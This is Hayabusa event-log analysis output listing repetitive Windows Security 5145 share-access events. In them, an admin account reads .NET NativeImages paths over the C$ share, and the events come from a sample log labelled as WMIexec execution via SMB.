2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Workfffcbcd8#\64d113caa8b81caec5c21797931b5624 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Xaml | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Xaml\10483ca149b5c651d217edbf2f3169b4 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Xaml.Hosting | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Xaml.Hosting\e9062794b3050c9564584baa07300c10 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\77bc1a994f64193efc124c297b93fdb7 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml.84e525b7# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.251 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml.84e525b7#\1e30da61ac8d97f7b17cdce57fb6a874 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.251 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml.Linq | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.251 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml.Linq\6f7a4225a199ad7894379512ca6ae50c | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\TaskScheduler | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\TaskScheduler\313baced763e9e5054e7694d5594cde5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Temp | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomatio4e153cb6# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomatio4e153cb6#\a1f231be2afa2e51dfc0a1f76644d2f7 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationClient | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationClient\abccca8c6f96e1d3c686a69acb31b9a9 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationProvider | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationProvider\c926f90d88838d450951cd6c5b41c961 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationTypes | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.282 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationTypes\3be4139a741b447ab35a2c788a2f4559 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.282 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Windows.Serf5111484# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.282 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Windows.Serf5111484#\d081d0c6a64c64fa9afe4e545f2eaa05 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.298 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\WindowsBase | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.298 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\WindowsBase\9bbf715cfb5360c95acd27b199083854 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.298 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\WindowsForm0b574481# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.298 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\WindowsForm0b574481#\f002202a6660cc8ce07f8ae19d6fac84 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.329 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\WsatConfig | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.329 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\WsatConfig\30fd20e8b16392d487e0f52dfd8a5900 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.329 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\XamlBuildTask | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.329 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\XamlBuildTask\72aa615c9ea48820d317a6bed7b07213 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.360 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\XsdBuildTask | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.360 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\XsdBuildTask\b1861416b236727b9d51d4568d9f6841 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.360 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.409 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Accessibility | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.409 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Accessibility\fabe62e146147faa9fc09e8b9a63d5cc | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.409 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\AuditPolicy42d3d2cc# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.409 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\AuditPolicy42d3d2cc#\9fe5c370593d72077c6ebc935bdccaf8 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\blbmmc | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\blbmmc\5965cfde76afc1f5c5d70d32fe0c7270 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\blbproxy | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\blbproxy\9efa8cc0254efc497ae439914bbe9207 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\blbwizfx | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\blbwizfx\8feba1d1646b72a4bc348315fa7bad6b | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\ComSvcConfig | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\ComSvcConfig\44570ea6e616aa8a35b0768a4336f69d | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.450 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\CustomMarshalers | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.450 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\CustomMarshalers\a5132d26ad1468bf7b6b89725e4cefce | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\dfsvc | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\dfsvc\a086b75bb1e8ee361af6ed079a6b77b4 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\EmbeddedLockdown | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\EmbeddedLockdown\870a6acacd5e95c0ffca82696cdb1d38 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\EventViewer | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\EventViewer\dc4701b2db7cf17a8b91db454a97c991 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
